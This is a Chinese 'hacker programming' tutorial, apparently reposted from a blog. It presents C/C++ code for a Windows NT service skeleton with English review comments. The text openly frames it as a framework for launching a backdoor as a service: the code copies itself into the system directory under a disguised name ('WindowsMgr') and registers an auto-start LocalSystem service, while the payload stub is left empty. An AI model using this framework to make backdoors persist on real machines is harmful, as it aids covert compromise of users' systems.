  • 黑客编程教程(八)编写NT服务

    先介绍一下什么是NT服务,实际上就是一个可以在系统启动时自动在一定身份下启动的,伴随着系统长期存在的进程.
      
       一个NT服务有三部分构成:
       1:Service Control Manager(SCM) 每个WIN NT/2K都有一个SCM,它存在于Service.exe中.
       2:服务本身 一个服务拥有能从SCM收到信号和命令所必需的特殊代码,并能够在处理后将它的状态返回SCM.
       3:Service Control Dispatcher(SCP) 它是一个拥有用户界面的程序,允许用户启动、暂停、继续并控制已经安装在计算机上作为服务运行的WIN32应用程序
    
    下面我们来看编写一个NT服务:(这是一个服务框架,只要在他后面添加自己的后门代码,那么后门就可以实现服务方式启动)
    请大家对照注释仔细研究!
    
    #include <stdio.h>
    #include <string.h>
    #include <windows.h>
     // Status record reported to the SCM; written by ServiceMain and ServiceCtrlHandler.
     SERVICE_STATUS m_ServiceStatus;
     // Handle returned by RegisterServiceCtrlHandler; required for every SetServiceStatus call.
     SERVICE_STATUS_HANDLE m_ServiceStatusHandle;
     // Set to true in ServiceMain and to false on SERVICE_CONTROL_STOP. Nothing visible in this
     // file reads it — presumably the work loop in CmdStart is meant to poll it; confirm.
     // Note: BOOL is initialised from `true`, so this file is built as C++, not C.
     BOOL bRunning=true;
     void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);                         // service entry point, invoked by the dispatcher
    void WINAPI ServiceCtrlHandler(DWORD Opcode);                               // receives control codes (stop, interrogate, ...) from the SCM
    void WINAPI CmdStart(void);        // the work the service performs once it reports RUNNING
    BOOL InstallService();         // copies this executable to the system directory and registers it as an auto-start service
    BOOL DeleteService();          // removes that registration and file; shadows Win32 DeleteService(SC_HANDLE) — only compiles as a C++ overload
    
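    // Command-line entry point.
    //   -install / -remove : act as the installer / uninstaller and exit.
    //   no arguments       : assume we were launched by the SCM and hand this thread to
    //                        StartServiceCtrlDispatcher, which calls ServiceMain.
    //
    // Review notes on the original: the argument check required argc == 3 although only
    // argv[1] is ever read, and because that check ran before the dispatcher call, an SCM
    // launch (argc == 1) printed the usage text and exited, so the service could never start.
    // Both are fixed below. The "\n" escapes that the page rendering dropped are restored.
    int main(int argc, char* argv[])
    {
     printf("\twindows based service demo\n");
     printf("\tgxisone@hotmail.com\n");

     if (argc == 2 && strcmp(argv[1], "-install") == 0)
     {
      if (InstallService())
       printf("\n\nService Installed Sucessfully\n");
      else
       printf("\n\nError Installing Service\n");
      return 0;
     }

     if (argc == 2 && strcmp(argv[1], "-remove") == 0)
     {
      if (DeleteService())
       printf("\n\nService remove sucessfully\n");
      else
       printf("\n\nError removing Service\n");
      return 0;
     }

     if (argc != 1)
     {
      printf("\nusage: %s -install[remove]\n", argv[0]);
      return 0;
     }

     // No arguments: register the services hosted by this process with the SCM. Each entry
     // pairs a service name with its entry point; the {NULL, NULL} entry terminates the table.
     // The name must match the one used in RegisterServiceCtrlHandler and CreateService.
     SERVICE_TABLE_ENTRY DispatchTable[] = {{"WindowsMgr", ServiceMain}, {NULL, NULL}};
     if (!StartServiceCtrlDispatcher(DispatchTable))
     {
      // The dispatcher only connects when the process was started by the SCM; an interactive
      // launch with no arguments ends up here, so show the usage text instead of failing silently.
      printf("\nusage: %s -install[remove]\n", argv[0]);
     }
     return 0;
    }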
    
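    // Entry point the dispatcher calls on its own thread for the "WindowsMgr" service.
    // Registers the control handler, reports SERVICE_RUNNING to the SCM and then runs
    // CmdStart. argc/argv carry the start parameters supplied by the SCM and are unused.
    //
    // Review notes: dwServiceType now matches the SERVICE_WIN32_OWN_PROCESS that
    // InstallService registers (the original reported the broader SERVICE_WIN32 bit set),
    // and the stray "//*" lines around CmdStart() are gone. If CmdStart returns, this
    // function returns with the reported state still SERVICE_RUNNING; presumably the
    // process then sits in StartServiceCtrlDispatcher until a stop control arrives.
    void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
    {
     (void)argc;
     (void)argv;

     m_ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
     m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
     // Only STOP is accepted, so the SCM never sends PAUSE/CONTINUE to the handler.
     m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
     m_ServiceStatus.dwWin32ExitCode = 0;
     m_ServiceStatus.dwServiceSpecificExitCode = 0;
     m_ServiceStatus.dwCheckPoint = 0;
     m_ServiceStatus.dwWaitHint = 0;

     // The name must be the one in main's dispatch table and in CreateService.
     m_ServiceStatusHandle = RegisterServiceCtrlHandler("WindowsMgr", ServiceCtrlHandler);
     if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
      return;   // no channel to the SCM, so nothing can be reported

     // Every SERVICE_STATUS field must be valid before each SetServiceStatus call.
     m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
     m_ServiceStatus.dwCheckPoint = 0;
     m_ServiceStatus.dwWaitHint = 0;
     SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);

     bRunning = true;
     CmdStart();   // the service's actual work, run on this thread
    }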
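     // Control handler registered by ServiceMain; the SCM calls it with a control code.
     // Updates the shared status record and reports it back.
     //
     // Review note: the original only called SetServiceStatus for STOP, so a PAUSE or
     // CONTINUE changed the local record without telling the SCM, and INTERROGATE
     // (which exists precisely to re-report the current status) answered nothing.
     // The status is now reported once, for every control code, after the switch.
     void WINAPI ServiceCtrlHandler(DWORD Opcode)
     {
      switch (Opcode)
      {
      case SERVICE_CONTROL_PAUSE:
       // Only reachable if dwControlsAccepted is extended with SERVICE_ACCEPT_PAUSE_CONTINUE.
       m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
       break;
      case SERVICE_CONTROL_CONTINUE:
       m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
       break;
      case SERVICE_CONTROL_STOP:
       m_ServiceStatus.dwWin32ExitCode = 0;
       m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
       m_ServiceStatus.dwCheckPoint = 0;
       m_ServiceStatus.dwWaitHint = 0;
       bRunning = false;   // signal for a work loop that polls it (none visible in this file)
       break;
      case SERVICE_CONTROL_INTERROGATE:
       break;   // nothing changes; the current status is re-reported below
      default:
       break;   // unknown code: report the unchanged status
      }
      SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
     }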
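     // Copies this executable to <system directory>\WindowsMgr.exe and registers that copy
     // with the SCM as the auto-start service "WindowsMgr". Returns true only if both steps
     // succeeded. With NULL for the account argument the service runs as LocalSystem.
     //
     // NOTE(review): this registration is exactly what defenders monitor — the SCM records
     // every newly installed service in the System event log (event 7045) and under the
     // Services registry key, so an unexpected auto-start entry here is a standard alert.
     //
     // Review notes on the original: GetCurrentDirectory's result was immediately overwritten
     // by GetModuleFileName (dead call, removed); the CopyFile test was inverted ("Copy file OK"
     // was printed on failure) and a failed copy still went on to register a service pointing
     // at a file that does not exist; the path was built with an unbounded strcat; the SCM
     // handle was never closed; and the "\\" escape in the file name had been lost.
     BOOL InstallService()
     {
      char strDir[1024];
      char chSysPath[1024];
      SC_HANDLE schSCManager, schService;
      BOOL ok = false;
      static const char kTail[] = "\\WindowsMgr.exe";

      // The SCM needs an absolute path; GetModuleFileName returns 0 on failure and the
      // buffer size when the path was truncated.
      DWORD n = GetModuleFileName(NULL, strDir, sizeof(strDir));
      if (n == 0 || n >= sizeof(strDir))
      {
       printf("cannot determine module path\n");
       return false;
      }

      // GetSystemDirectory returns the length written, or the size needed if too small.
      UINT s = GetSystemDirectory(chSysPath, sizeof(chSysPath));
      if (s == 0 || s + strlen(kTail) >= sizeof(chSysPath))
      {
       printf("cannot determine system directory\n");
       return false;
      }
      strcat(chSysPath, kTail);

      // Place the binary in the system directory (overwriting an existing copy).
      if (!CopyFile(strDir, chSysPath, FALSE))
      {
       printf("Copy file failed\n");
       return false;
      }
      printf("Copy file OK\n");

      // SC_MANAGER_CREATE_SERVICE would be the least-privilege choice; ALL_ACCESS is kept
      // to preserve the original's behaviour. Either way this needs administrative rights.
      schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
      if (schSCManager == NULL)
      {
       printf("open scmanger failed,maybe you do not have the privilage to do this\n");
       return false;
      }

      // Adds the service record to the SCM database.
      schService = CreateService(schSCManager, "WindowsMgr", "Windows Manger Control",
       SERVICE_ALL_ACCESS,
       SERVICE_WIN32_OWN_PROCESS,   // service type: runs in its own process
       SERVICE_AUTO_START,          // start type: launched by the SCM at boot
       SERVICE_ERROR_NORMAL,
       chSysPath,                   // binary path of the copy made above
       NULL, NULL, NULL,
       NULL,                        // account: NULL means LocalSystem
       NULL);
      if (schService == NULL)
      {
       printf("faint,we failed just because we invoke createservices failed\n");
      }
      else
      {
       CloseServiceHandle(schService);
       ok = true;
      }
      CloseServiceHandle(schSCManager);
      return ok;
     }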
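     // Removes the file <system directory>\WindowsMgr.exe and then the "WindowsMgr" service
     // registration. Returns true only if the file, the service record and the handle
     // close all succeeded; as in the original, a failed file deletion aborts before the
     // service record is touched.
     //
     // This zero-argument function shadows the Win32 API DeleteService(SC_HANDLE). The
     // one-argument call below resolves to the API via C++ overloading; compiled as C the
     // two declarations conflict.
     //
     // Review notes on the original: SCM and service handles leaked on every early return,
     // and the "\\" escape in the file name had been lost. If the service process is still
     // running, the executable is in use and DeleteFile fails — stop the service first.
     BOOL DeleteService()
     {
      char chSysPath[1024];
      static const char kTail[] = "\\WindowsMgr.exe";
      SC_HANDLE schSCManager;
      SC_HANDLE hService;
      BOOL ok = false;

      // GetSystemDirectory returns the length written, or the size needed if too small.
      UINT s = GetSystemDirectory(chSysPath, sizeof(chSysPath));
      if (s == 0 || s + strlen(kTail) >= sizeof(chSysPath))
      {
       printf("cannot determine system directory\n");
       return false;
      }
      strcat(chSysPath, kTail);

      schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
      if (schSCManager == NULL)
      {
       printf("faint,open scmanger failed\n");
       return false;
      }

      hService = OpenService(schSCManager, "WindowsMgr", SERVICE_ALL_ACCESS);
      if (hService == NULL)
      {
       printf("faint,open services failt\n");
       CloseServiceHandle(schSCManager);
       return false;
      }

      if (DeleteFile(chSysPath) == 0)
      {
       printf("Dell file Failure !\n");
      }
      else
      {
       printf("Delete file OK!\n");
       // Win32 DeleteService(SC_HANDLE): marks the record for removal once all handles close.
       if (DeleteService(hService) != 0)
        ok = true;
      }

      // The original treated a failed handle close as an overall failure; keep that.
      if (CloseServiceHandle(hService) == 0)
       ok = false;
      CloseServiceHandle(schSCManager);
      return ok;
     }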
    
    // Body of the service. ServiceMain calls this immediately after reporting
    // SERVICE_RUNNING to the SCM, so whatever is placed here runs on the ServiceMain
    // thread. The stub is empty: there is no work loop, and bRunning (cleared by the
    // handler on SERVICE_CONTROL_STOP) is not consulted by any code visible in this file.
    void WINAPI CmdStart(void)
     {
               // Put the code that should run as the service here;
              // it is then launched by the SCM as an NT service.
             
     }
  • 原文地址:https://www.cnblogs.com/rinack/p/3195641.html